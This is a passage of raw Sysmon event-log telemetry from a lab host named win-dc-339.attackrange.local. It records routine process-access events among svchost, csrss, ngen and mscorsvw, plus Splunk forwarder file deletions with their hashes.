v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.622{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-210F-00000000BB01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.622{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-210F-00000000BB01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.622{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-210F-00000000BB01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.575{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-200F-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.559{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-200F-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.559{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-200F-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.559{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=483E73C2402BCF0CE31AD3A173DF8FCB,SHA256=45253F1A9A83A4E65F930DD0574A22C9FD6B964C8842577C09322D62C7E827C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.544{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4335D309F5E481633B2E9A8CC6439B70,SHA256=1496DB8A43CC92990BD4E1A8E07F5CFF86548C9B72DFB8716CE28A9D04DD6A68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.544{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FF10D5AC65894E7AD43CF6FA8A0B2499,SHA256=A9AE99612ECB9CE227599CDEA0BA328CB8DA2A0FF51967D22E0ACA0FC22E4AAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.544{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=326AF26FFC71A6CB4C7D93B122321A98,SHA256=4BC9AA1062D71D91D05D4B585E1895C2D3230352C3FBF18269059288458300D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.528{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-1F0F-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.513{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-1F0F-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.513{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-1F0F-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.481{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-1E0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.450{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-1E0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.450{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-1E0F-00000000BB01}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.325{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.310{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-1D0F-00000000BB01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.278{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-1D0F-00000000BB01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.278{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-1D0F-00000000BB01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.247{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-1C0F-00000000BB01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.216{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2D-607E-1C0F-00000000BB01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.216{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2D-607E-1C0F-00000000BB01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.185{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2D-607E-1B0F-00000000BB01}3308C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 